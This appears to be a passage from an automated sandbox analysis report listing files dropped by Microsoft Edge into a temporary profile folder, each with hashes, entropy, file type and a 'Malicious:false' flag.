                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):267
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.235018122493502
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:knAs1923fQyS/DQM72KLlmPS+q2P923fQyS/DQMxIFUv:NBkLQjv47FUv
                                                                                                                                                                                                                                                                                                              MD5:8FF0D32B3F9A9989E0EFBDAC58EAA7D1
                                                                                                                                                                                                                                                                                                              SHA1:3B83FDE9FBB460856D17DA91C66732A199FA23DC
                                                                                                                                                                                                                                                                                                              SHA-256:155675F94B544AC42088E3AC4BF5D1C658A58409EED934892B742DFD1F720467
                                                                                                                                                                                                                                                                                                              SHA-512:B2E0A5B3967BA28805876CEAF442ECE036B1E5B570AF8289930875C214E7B20BD789149BA02F7B0442042AFCA842209D06EAAA32D7F1B837F94E2B6E6D068292
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:53.672 1b48 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Session Storage since it was missing..2024/12/22-17:54:53.714 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Session Storage/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Session Storage\MANIFEST-000001

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Site Characteristics Database\000001.dbtmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Site Characteristics Database\000003.log

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.473726825238924
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:41tt0diERGn:et084G
                                                                                                                                                                                                                                                                                                              MD5:148079685E25097536785F4536AF014B
                                                                                                                                                                                                                                                                                                              SHA1:C5FF5B1B69487A9DD4D244D11BBAFA91708C1A41
                                                                                                                                                                                                                                                                                                              SHA-256:F096BC366A931FBA656BDCD77B24AF15A5F29FC53281A727C79F82C608ECFAB8
                                                                                                                                                                                                                                                                                                              SHA-512:C2556034EA51ABFBC172EB62FF11F5AC45C317F84F39D4B9E3DDBD0190DA6EF7FA03FE63631B97AB806430442974A07F8E81B5F7DC52D9F2FCDC669ADCA8D91F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.On.!................database_metadata.1

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Site Characteristics Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):295
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.139094133280858
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kaX0Rq1923fQyS/TUh2gr52KLlmaH+q2P923fQyS/TUh2ghZIFUv:30xHhHJL2v4HhHh2FUv
                                                                                                                                                                                                                                                                                                              MD5:25403ACAE52A047A11BF1533B67C92BC
                                                                                                                                                                                                                                                                                                              SHA1:6E17A73A0FF1FAB30AEBFA71E86FB97450B5163C
                                                                                                                                                                                                                                                                                                              SHA-256:0351489086279DBFE2F6C0910C340FA7944937F1488845E57C569D751B03BCDC
                                                                                                                                                                                                                                                                                                              SHA-512:CFAC66E7FE49F5A87D4AB29CF3C29696110EC449EC28F0D5AEDF99A77C2DBC48EE5ACF53719AB37F324176D9786EC66F98BF4FE0764F2143B043E49000B6A10A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:52.772 1818 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Site Characteristics Database since it was missing..2024/12/22-17:54:52.794 1818 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Site Characteristics Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Site Characteristics Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Sync Data\LevelDB\000001.dbtmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Sync Data\LevelDB\000003.log

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):46
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.019797536844534
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:sLollttz6sjlGXU2tkn:qolXtWswXU2tkn
                                                                                                                                                                                                                                                                                                              MD5:90881C9C26F29FCA29815A08BA858544
                                                                                                                                                                                                                                                                                                              SHA1:06FEE974987B91D82C2839A4BB12991FA99E1BDD
                                                                                                                                                                                                                                                                                                              SHA-256:A2CA52E34B6138624AC2DD20349CDE28482143B837DB40A7F0FBDA023077C26A
                                                                                                                                                                                                                                                                                                              SHA-512:15F7F8197B4FC46C4C5C2570FB1F6DD73CB125F9EE53DFA67F5A0D944543C5347BDAB5CCE95E91DD6C948C9023E23C7F9D76CFF990E623178C92F8D49150A625
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...n'................_mts_schema_descriptor...

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Sync Data\LevelDB\CURRENT (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):271
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.248921083092221
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kad0Rq1923fQyS/Zx2KLlmakXnt+q2P923fQyS/RIFUv:90x0VLMXnov47FUv
                                                                                                                                                                                                                                                                                                              MD5:237424CD5B717F3492C3C58382CD0D46
                                                                                                                                                                                                                                                                                                              SHA1:A2E37C6E51B3147BD7051E7A969318C9731D6C9E
                                                                                                                                                                                                                                                                                                              SHA-256:40F01612A84B96D3DE3A280A15EB06542106037E73BFF5E48679A6E6C014D574
                                                                                                                                                                                                                                                                                                              SHA-512:9B1100D345A349DD31D8E9ADB72C6F43B2479255EC7633C39BD99BAC0081BC85DAE340C931D85FA094EB1C2CE31DA626D2444B67AC35057807C5751834F0AE4F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:52.716 1818 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Sync Data\LevelDB since it was missing..2024/12/22-17:54:52.762 1818 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Sync Data\LevelDB/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Sync Data\LevelDB\MANIFEST-000001

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Top Sites

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3528485475628876
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
                                                                                                                                                                                                                                                                                                              MD5:F2B4FB2D384AA4E4D6F4AEB0BBA217DC
                                                                                                                                                                                                                                                                                                              SHA1:2CD70CFB3CE72D9B079170C360C1F563B6BF150E
                                                                                                                                                                                                                                                                                                              SHA-256:1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
                                                                                                                                                                                                                                                                                                              SHA-512:48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Visited Links

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):131072
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.002110589502647469
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:ImtVit:IiVi
                                                                                                                                                                                                                                                                                                              MD5:F0064E56FEAF6D8262CE8B5686F1A753
                                                                                                                                                                                                                                                                                                              SHA1:5A5FCA1C190C0B58FCF5870750113979A1A4313A
                                                                                                                                                                                                                                                                                                              SHA-256:515E31B3501EFE787ABB46DEE6E767621068078D327943344A432DD3B40A4E82
                                                                                                                                                                                                                                                                                                              SHA-512:6F296B0638D318853080AA52BEBC48AAF022755E714A0F6D258F7D0865D640442E206F833D2A0733FAA58E3FDEA2E587EF9D5D6430191D4B64EE8277443D0631
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:VLnk.....?......z.GO....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Web Data

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 87, cookie 0x36, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):178176
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.9401384989520177
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Qrb2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+c:Q/2qOB1nxCkvSAELyKOMq+c
                                                                                                                                                                                                                                                                                                              MD5:6817EEA7CE56E1AB1ECF93C090727E0F
                                                                                                                                                                                                                                                                                                              SHA1:49A10B3D157FB49768284F68335CC7B378FB13B4
                                                                                                                                                                                                                                                                                                              SHA-256:FF7B98237D2FA7537470A573B9FD12D9C656EDACC0949AA12B75970528F650CD
                                                                                                                                                                                                                                                                                                              SHA-512:6E14A0B0A47B493493F6C0C8C2A15028C0C1D53E247D1FB2D227DC772ACFB6ADF2B74CBC8FB223156A1D39A1295FFF7EC054E9BE51DBF7BCE61CC597510C4EAE
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......W...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Web Data-journal

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2568
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.06569804787746028
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:btEl1lOtlxn:m0
                                                                                                                                                                                                                                                                                                              MD5:F7A071AB3C3C994F587069237D44CFE9
                                                                                                                                                                                                                                                                                                              SHA1:EF2EE7A5FA0D4574AE9F259995BAA1923C214A55
                                                                                                                                                                                                                                                                                                              SHA-256:2AEA20F0DEA59C5A1B889BA21B9023A3DB8BB5D17049D9F6D05D9AE9E33CE53C
                                                                                                                                                                                                                                                                                                              SHA-512:45F04DA4CAB6D1178378C9FFDE978F145DA929E2817273815F0A167144C5810B9A8DD269D21D3A1EDEF0AB82F73E962220A833588240F4E294FBCA8C9A810AF9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:............$hv....W....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3852), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):11417
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.237554345326078
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:dH4vrmORnBtW4PoiUDNaxvR5FCHFcoaSbqGEDu:dH4vrmonPW4jR3GaSbqGEDu
                                                                                                                                                                                                                                                                                                              MD5:DF790948C5A7B5DD19D033FE6C793868
                                                                                                                                                                                                                                                                                                              SHA1:0C4A681E07505CA84997CE78FEEE1F0D88CB8E2A
                                                                                                                                                                                                                                                                                                              SHA-256:CB4049061A6A78013D20CC4AB396BEF4F6C35306887BE76765EED4E51EEE702D
                                                                                                                                                                                                                                                                                                              SHA-512:251C3B5DE5452E2F40C648BDB2E3D1CE2315DD4DFFAF4B4E5E08528DBAAB80535F1A82E183A65AB7DCA0C2926AE5D6B61F06DB390D0E3B8D8E77E826B21042CB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{.. "ArbitrationSignal": "(time_elapsed_since_last_notification)-3600^(notification_quick_dismiss_rate_lower_ci+notification_disable_rate+notification_snooze_rate)",.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f41

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\b72427c0-c350-4f52-886e-ae6284f31ada.tmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\000001.dbtmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
